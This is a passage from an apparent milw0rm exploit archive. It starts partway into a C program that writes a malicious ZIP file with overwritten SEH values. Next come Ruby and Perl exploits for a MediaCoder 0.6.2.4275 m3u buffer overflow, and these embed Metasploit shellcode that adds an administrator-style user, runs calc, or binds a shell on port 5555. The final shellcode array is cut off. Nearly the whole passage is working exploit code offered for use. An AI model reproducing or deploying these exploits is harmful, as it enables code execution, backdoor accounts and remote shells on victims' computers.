0x4C, 0x4D, 0x4E, 0x4E, 0x4F, 0x4B, 0x33, 0x42, 0x55, 0x4F, 0x4F, 0x48, 0x4D, 0x4F, 0x45, 0x49,
0x58, 0x45, 0x4E, 0x48, 0x56, 0x41, 0x48, 0x4D, 0x4E, 0x4A, 0x50, 0x44, 0x30, 0x45, 0x35, 0x4C,
0x36, 0x44, 0x50, 0x4F, 0x4F, 0x42, 0x4D, 0x4A, 0x36, 0x49, 0x4D, 0x49, 0x50, 0x45, 0x4F, 0x4D,
0x4A, 0x47, 0x45, 0x4F, 0x4F, 0x48, 0x4D, 0x43, 0x55, 0x43, 0x45, 0x43, 0x35, 0x43, 0x35, 0x43,
0x35, 0x43, 0x54, 0x43, 0x55, 0x43, 0x54, 0x43, 0x35, 0x4F, 0x4F, 0x42, 0x4D, 0x48, 0x46, 0x4A,
0x56, 0x41, 0x41, 0x4E, 0x45, 0x48, 0x56, 0x43, 0x45, 0x49, 0x48, 0x41, 0x4E, 0x45, 0x59, 0x4A,
0x46, 0x46, 0x4A, 0x4C, 0x31, 0x42, 0x57, 0x47, 0x4C, 0x47, 0x55, 0x4F, 0x4F, 0x48, 0x4D, 0x4C,
0x36, 0x42, 0x41, 0x41, 0x35, 0x45, 0x45, 0x4F, 0x4F, 0x42, 0x4D, 0x4A, 0x56, 0x46, 0x4A, 0x4D,
0x4A, 0x50, 0x32, 0x49, 0x4E, 0x47, 0x35, 0x4F, 0x4F, 0x48, 0x4D, 0x43, 0x55, 0x45, 0x45, 0x4F,
0x4F, 0x42, 0x4D, 0x4A, 0x56, 0x45, 0x4E, 0x49, 0x54, 0x48, 0x58, 0x49, 0x44, 0x47, 0x45, 0x4F,
0x4F, 0x48, 0x4D, 0x42, 0x35, 0x46, 0x55, 0x46, 0x55, 0x45, 0x55, 0x4F, 0x4F, 0x42, 0x4D, 0x43,
0x39, 0x4A, 0x36, 0x47, 0x4E, 0x49, 0x47, 0x48, 0x4C, 0x49, 0x57, 0x47, 0x45, 0x4F, 0x4F, 0x48,
0x4D, 0x45, 0x55, 0x4F, 0x4F, 0x42, 0x4D, 0x48, 0x46, 0x4C, 0x56, 0x46, 0x36, 0x48, 0x36, 0x4A,
0x56, 0x43, 0x46, 0x4D, 0x36, 0x49, 0x48, 0x45, 0x4E, 0x4C, 0x46, 0x42, 0x45, 0x49, 0x35, 0x49,
0x32, 0x4E, 0x4C, 0x49, 0x38, 0x47, 0x4E, 0x4C, 0x56, 0x46, 0x34, 0x49, 0x58, 0x44, 0x4E, 0x41,
0x43, 0x42, 0x4C, 0x43, 0x4F, 0x4C, 0x4A, 0x50, 0x4F, 0x44, 0x54, 0x4D, 0x32, 0x50, 0x4F, 0x44,
0x34, 0x4E, 0x52, 0x43, 0x39, 0x4D, 0x38, 0x4C, 0x37, 0x4A, 0x33, 0x4B, 0x4A, 0x4B, 0x4A, 0x4B,
0x4A, 0x4A, 0x56, 0x44, 0x57, 0x50, 0x4F, 0x43, 0x4B, 0x48, 0x41, 0x4F, 0x4F, 0x45, 0x37, 0x46,
0x44, 0x4F, 0x4F, 0x48, 0x4D, 0x4B, 0x45, 0x47, 0x45, 0x44, 0x55, 0x41, 0x35, 0x41, 0x45, 0x41,
0x35, 0x4C, 0x36, 0x41, 0x30, 0x41, 0x55, 0x41, 0x45, 0x45, 0x45, 0x41, 0x45, 0x4F, 0x4F, 0x42,
0x4D, 0x4A, 0x46, 0x4D, 0x4A, 0x49, 0x4D, 0x45, 0x30, 0x50, 0x4C, 0x43, 0x55, 0x4F, 0x4F, 0x48,
0x4D, 0x4C, 0x36, 0x4F, 0x4F, 0x4F, 0x4F, 0x47, 0x43, 0x4F, 0x4F, 0x42, 0x4D, 0x4B, 0x48, 0x47,
0x45, 0x4E, 0x4F, 0x43, 0x58, 0x46, 0x4C, 0x46, 0x46, 0x4F, 0x4F, 0x48, 0x4D, 0x44, 0x45, 0x4F,
0x4F, 0x42, 0x4D, 0x4A, 0x56, 0x42, 0x4F, 0x4C, 0x48, 0x46, 0x50, 0x4F, 0x45, 0x43, 0x55, 0x4F,
0x4F, 0x48, 0x4D, 0x4F, 0x4F, 0x42, 0x4D, 0x5A, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x41, 0x49, 0x89, 0x04, 0x02, 0x12, 0x01, 0x61, 0x82, 0xFD, 0x81, 0x98,
0x98, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x2E, 0x74, 0x78, 0x74, 0x50, 0x4B, 0x05, 0x06, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00,
0x42, 0x08, 0x00, 0x00, 0x32, 0x08, 0x00, 0x00, 0x00, 0x00,
};


#define NEXT_SEH 2196
#define SEH_CHAIN 2200

#define SIZE 90000



int main (int argc, char *argv[])
{
int offset = 0,
i = 0,
next = 0x41414141,
seh_chain = 0x58585858;

char buffer[SIZE];

FILE *f;
/* open in binary mode so 0x0A bytes in the zip image are written unchanged on Windows */
f = fopen ("file.zip", "wb");
assert (f != NULL);

/* pre-fill the whole buffer with 0x90 before the zip image is copied over it */
do {
buffer[i] = 0x90;
i++;
} while (i < SIZE);

memcpy (buffer, file, sizeof (file));
offset = NEXT_SEH;
memcpy (buffer + offset, &next, 4);
offset = SEH_CHAIN;
memcpy (buffer + offset, &seh_chain, 4);
fwrite (buffer, 1, sizeof (file), f);
fclose (f);
/* buffer is a stack array, so it must not be passed to free() */
return 0;
}

#milw0rm

MediaCoder 0.6.2.4275 Universal Buffer Overflow Exploit (SEH)

#!/usr/bin/env ruby
# MediaCoder 0.6.2.4275 Universal Buffer Overflow Exploit (SEH)
# Universal SEH Overwrite Exploit
# By Stack
# Mountassif Moad
# Download app : http://mediacoder.sourceforge.net/mirrors.htm?file=MediaCoder-0.6.2.4275.exe
# cat Greatz.txt
# Jadi-Chel7 & Mr.Safa7 & Houssamix & Simo-Soft & DDos & Simo64 & G0rillaz & Issam & Sec-Alert & & Bohayra & j0rd4n14n.r1z
# Webug & Travis-Barker & Keyo & General l0s3r & NeoCoderz & welahima b9ite 3arefe chkoune akhore rani tansa :d
# ahe nsite big thnx to Str0ke and thanks you for all patience and your advice & support
time3 = Time.new
puts "Exploit Started in Current Time :" + time3.inspect
puts "Enter Name For your File Like : Stack"
files = gets.chomp.capitalize
puts "Name Of File : " + files +'.m3u'
time1 = Time.new
$VERBOSE=nil
Header =
"\x23\x45\x58\x54\x4D\x33\x55\x0D\x0A\x23\x45\x58\x54\x49\x4E\x46"+
"\x3A\x33\x3A\x35\x30\x2C\x4C\x61\x6D\x62\x20\x4F\x66\x20\x47\x6F"+
"\x64\x20\x2D\x20\x53\x65\x74\x20\x54\x6F\x20\x46\x61\x69\x6C\x20"+
"\x0D\x0A\x44\x3A\x5C"
# win32_adduser - PASS=toor EXITFUNC=seh USER=root Size=489 Encoder=PexAlphaNum http://metasploit.com
Shellscode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"+
"\x42\x50\x42\x30\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x38\x4e\x47"+
"\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x48"+
"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x58\x46\x53\x4b\x58"+
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"+
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"+
"\x46\x4f\x4b\x33\x46\x45\x46\x42\x46\x50\x45\x57\x45\x4e\x4b\x48"+
"\x4f\x55\x46\x42\x41\x30\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34"+
"\x4b\x48\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x48\x4e\x41\x4b\x58"+
"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x53"+
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x57"+
"\x4e\x50\x4b\x38\x42\x54\x4e\x50\x4b\x58\x42\x57\x4e\x41\x4d\x4a"+
"\x4b\x38\x4a\x56\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x58\x42\x4b"+
"\x42\x50\x42\x30\x42\x50\x4b\x48\x4a\x46\x4e\x43\x4f\x35\x41\x53"+
"\x48\x4f\x42\x46\x48\x55\x49\x48\x4a\x4f\x43\x48\x42\x4c\x4b\x37"+
"\x42\x55\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x45\x4a\x36\x4a\x39"+
"\x50\x4f\x4c\x58\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x4d\x46"+
"\x46\x56\x50\x52\x45\x36\x4a\x47\x45\x46\x42\x52\x4f\x32\x43\x46"+
"\x42\x52\x50\x56\x45\x56\x46\x37\x42\x52\x45\x57\x43\x57\x45\x46"+
"\x44\x37\x42\x32\x44\x47\x4f\x46\x4f\x56\x46\x37\x42\x32\x46\x37"+
"\x4f\x36\x4f\x56\x44\x57\x42\x52\x4f\x42\x41\x44\x46\x54\x46\x34"+
"\x42\x52\x48\x52\x48\x52\x42\x32\x50\x56\x45\x36\x46\x37\x42\x52"+
"\x4e\x36\x4f\x46\x43\x56\x41\x56\x4e\x36\x47\x36\x44\x57\x4f\x36"+
"\x45\x57\x42\x47\x42\x52\x41\x34\x46\x46\x4d\x36\x49\x46\x50\x56"+
"\x49\x36\x43\x47\x46\x47\x44\x37\x41\x36\x46\x57\x4f\x56\x44\x57"+
"\x43\x47\x42\x32\x44\x57\x4f\x56\x4f\x46\x46\x47\x42\x32\x4f\x32"+
"\x41\x54\x46\x54\x46\x54\x42\x50\x5a"
# Media_bruteforcer_shellcode
Bruteforce = # BruteForce the shellcode to runing if it dont work in the first methode
"\xD0\x62\x43"+ # SHL BYTE PTR DS:[EDX+43],1
"\x00\xB8\x6D"+ # ADD BYTE PTR DS:[EAX+1ABBB6D],BH
"\xBB\xAB\x01"+
"\x00\x00"+ # ADD BYTE PTR DS:[EAX],AL
"\x00\xF0"+ # ADD AL,DH
"\xFF\x13"+ # CALL DWORD PTR DS:[EBX]
"\x00\x4F\x6D"+ # ADD BYTE PTR DS:[EDI+6D],CL
"\x81\x7C\x38\x07"+ # CMP DWORD PTR DS:[EAX+EDI+7],FFFF7C92
"\x92\x7C\xFF"+
"\xFF\xFF" + Shellscode
Rhunter =
"\x5B"+ #POP EBX
"\x90" * 10 + # NOP x 10
"\x90\x90"+ # NOP NOP
"\x8D\x44\xC1\x04"+ # LEA EAX,DWORD PTR DS:[ECX+EAX*8+4]
"\x8B\x1E"+ # MOV EBX,DWORD PTR DS:[ESI]
"\x89\x18"+ # MOV DWORD PTR DS:[EAX],EBX
"\x89\x06"+ # MOV DWORD PTR DS:[ESI],EAX
"\x42"+ # INC EDX
"\x83\xFA\x64"+ # CMP EDX,64
"\x75\xEC"+ # JNZ SHORT dsp_chmx.0169127E
"\x8B\x06"+ # MOV EAX,DWORD PTR DS:[ESI]
"\x8B\x10"+ # MOV EDX,DWORD PTR DS:[EAX]
"\x89\x16"+ # MOV DWORD PTR DS:[ESI],EDX
"\x5E"+ # POP ESI
"\x5B"+ # POP EBX
"\x93\x43"+ # CALL ESP
"\x92\x7c"
Over = "\x41" * 195 + "\xff\xff\xff\xff" + "\x47" * 4 + "\x42" * 6 + "\xff\xff\x47\x47\x47\xFF\x65\x78\x77\x76"
Nop = "\x90" * 8
Next_Seh = "\xeb\x06\xff\xff"
Seh = "\x93\xB6\x98\x7C"
Nopsled = "\x90" * 7
Xpl = Header + Over + Rhunter + Nop + Shellscode + Nopsled + Next_Seh + Seh + Nop + Bruteforce + Nopsled
File.open( files+".m3u", "w" ) do |the_file|
the_file.puts(Xpl)
puts "Exploit finished in Current Time :" + time1.inspect
puts "Now Open " + files +".m3u :d"
end

# milw0rm

MediaCoder 0.6.2.4275 (m3u File) Universal Stack Overflow Exploit

#!/usr/bin/perl
# MediaCoder 0.6.2.4275 Universal Stack Based Overflow
# By Stack
# Mountassif Moad
# cat Greatz.txt
# Jadi-Chel7 & Mr.Safa7 & Houssamix & Simo-Soft & DDos & Simo64 & G0rillaz & Issam & Sec-Alert & & Bohayra & j0rd4n14n.r1z
# Webug & Travis-Barker & Keyo & General l0s3r & NeoCoderz & welahima b9ite 3arefe chkoune akhore rani tansa :d
# ahe nsite big thnx to Str0ke and thanks you for all patience and your advice & support
my $header= "\x23\x45\x58\x54\x4D\x33\x55\x0D\x0A\x23\x45\x58\x54\x49\x4E\x46".
"\x3A\x33\x3A\x35\x30\x2C\x4C\x61\x6D\x62\x20\x4F\x66\x20\x47\x6F".
"\x64\x20\x2D\x20\x53\x65\x74\x20\x54\x6F\x20\x46\x61\x69\x6C\x20".
"\x0D\x0A\x44\x3A\x5C";

my $junk = "\x41" x 254;
my $ret = "\x93\x43\x92\x7c"; # Universal return adress :d
my $nop = "\x90" x 25;
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
my $calc_shell =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
"\x42\x50\x42\x50\x42\x30\x4b\x48\x45\x34\x4e\x43\x4b\x38\x4e\x47".
"\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48".
"\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x34\x4b\x48\x46\x53\x4b\x48".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c".
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x55\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x38".
"\x4f\x45\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x54".
"\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x58".
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x30\x43\x4c\x41\x43".
"\x42\x4c\x46\x36\x4b\x58\x42\x34\x42\x33\x45\x48\x42\x4c\x4a\x57".
"\x4e\x30\x4b\x48\x42\x44\x4e\x30\x4b\x48\x42\x47\x4e\x41\x4d\x4a".
"\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b".
"\x42\x50\x42\x50\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x45\x41\x33".
"\x48\x4f\x42\x36\x48\x45\x49\x48\x4a\x4f\x43\x38\x42\x4c\x4b\x47".
"\x42\x55\x4a\x46\x42\x4f\x4c\x38\x46\x50\x4f\x55\x4a\x36\x4a\x39".
"\x50\x4f\x4c\x38\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x36".
"\x4e\x56\x43\x36\x50\x32\x45\x36\x4a\x57\x45\x56\x42\x30\x5a";

# win32_adduser - PASS=toor EXITFUNC=seh USER=root Size=489 Encoder=PexAlphaNum http://metasploit.com
my $adduser_shell =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
"\x42\x30\x42\x30\x42\x50\x4b\x58\x45\x54\x4e\x43\x4b\x58\x4e\x37".
"\x45\x50\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x31\x4b\x48".
"\x4f\x55\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x38\x46\x43\x4b\x58".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c".
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x45\x46\x52\x46\x30\x45\x47\x45\x4e\x4b\x58".
"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x30\x4b\x54".
"\x4b\x58\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
"\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x53".
"\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x37".
"\x4e\x30\x4b\x48\x42\x34\x4e\x30\x4b\x58\x42\x47\x4e\x51\x4d\x4a".
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
"\x42\x30\x42\x50\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x35\x41\x53".
"\x48\x4f\x42\x46\x48\x55\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
"\x42\x45\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x56\x4a\x49".
"\x50\x4f\x4c\x48\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x36\x4d\x46".
"\x46\x36\x50\x52\x45\x56\x4a\x57\x45\x36\x42\x52\x4f\x42\x43\x56".
"\x42\x42\x50\x56\x45\x36\x46\x37\x42\x52\x45\x37\x43\x47\x45\x46".
"\x44\x57\x42\x52\x44\x57\x4f\x56\x4f\x56\x46\x37\x42\x42\x46\x57".
"\x4f\x46\x4f\x46\x44\x37\x42\x42\x4f\x52\x41\x44\x46\x34\x46\x34".
"\x42\x42\x48\x32\x48\x52\x42\x32\x50\x36\x45\x46\x46\x47\x42\x42".
"\x4e\x56\x4f\x56\x43\x46\x41\x56\x4e\x46\x47\x36\x44\x37\x4f\x56".
"\x45\x47\x42\x57\x42\x42\x41\x44\x46\x36\x4d\x46\x49\x46\x50\x56".
"\x49\x36\x43\x57\x46\x37\x44\x37\x41\x56\x46\x37\x4f\x46\x44\x57".
"\x43\x47\x42\x32\x44\x57\x4f\x56\x4f\x56\x46\x47\x42\x32\x4f\x32".
"\x41\x44\x46\x44\x46\x34\x42\x50\x5a";

# win32_bind - EXITFUNC=seh LPORT=5555 Size=709 Encoder=PexAlphaNum http://metasploit.com
my $bind_shell =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e".
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x38".
"\x4e\x46\x46\x42\x46\x32\x4b\x48\x45\x54\x4e\x53\x4b\x58\x4e\x47".
"\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x31\x4b\x58".
"\x4f\x55\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x38".
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x38\x42\x4c".
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x43\x46\x45\x46\x52\x4a\x52\x45\x37\x45\x4e\x4b\x48".
"\x4f\x45\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x38\x4e\x50\x4b\x34".
"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x43\x50\x4e\x32\x4b\x38".
"\x49\x58\x4e\x56\x46\x42\x4e\x41\x41\x56\x43\x4c\x41\x53\x4b\x4d".
"\x46\x36\x4b\x38\x43\x34\x42\x53\x4b\x58\x42\x34\x4e\x30\x4b\x48".
"\x42\x47\x4e\x51\x4d\x4a\x4b\x58\x42\x54\x4a\x50\x50\x45\x4a\x56".
"\x50\x58\x50\x44\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56".
"\x43\x35\x48\x46\x4a\x46\x43\x43\x44\x53\x4a\x36\x47\x37\x43\x47".
"\x44\x33\x4f\x45\x46\x55\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e".
"\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x45\x49\x58\x45\x4e".
"\x48\x46\x41\x38\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x46\x44\x30".
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45".
"\x4f\x4f\x48\x4d\x43\x55\x43\x35\x43\x45\x43\x55\x43\x55\x43\x34".
"\x43\x45\x43\x54\x43\x35\x4f\x4f\x42\x4d\x48\x36\x4a\x36\x45\x41".
"\x43\x4b\x48\x36\x43\x45\x49\x38\x41\x4e\x45\x49\x4a\x56\x46\x4a".
"\x4c\x41\x42\x57\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x41".
"\x41\x55\x45\x45\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x52".
"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d".
"\x4a\x36\x45\x4e\x49\x44\x48\x58\x49\x44\x47\x45\x4f\x4f\x48\x4d".
"\x42\x45\x46\x35\x46\x55\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x46".
"\x47\x4e\x49\x57\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45".
"\x4f\x4f\x42\x4d\x48\x36\x4c\x46\x46\x36\x48\x36\x4a\x56\x43\x36".
"\x4d\x36\x49\x58\x45\x4e\x4c\x56\x42\x55\x49\x35\x49\x52\x4e\x4c".
"\x49\x58\x47\x4e\x4c\x36\x46\x34\x49\x48\x44\x4e\x41\x43\x42\x4c".
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x54\x4e\x32".
"\x43\x39\x4d\x38\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56".
"\x44\x47\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x34\x4f\x4f".
"\x48\x4d\x4b\x35\x47\x35\x44\x45\x41\x55\x41\x35\x41\x55\x4c\x36".
"\x41\x30\x41\x55\x41\x35\x45\x35\x41\x45\x4f\x4f\x42\x4d\x4a\x46".
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x46".
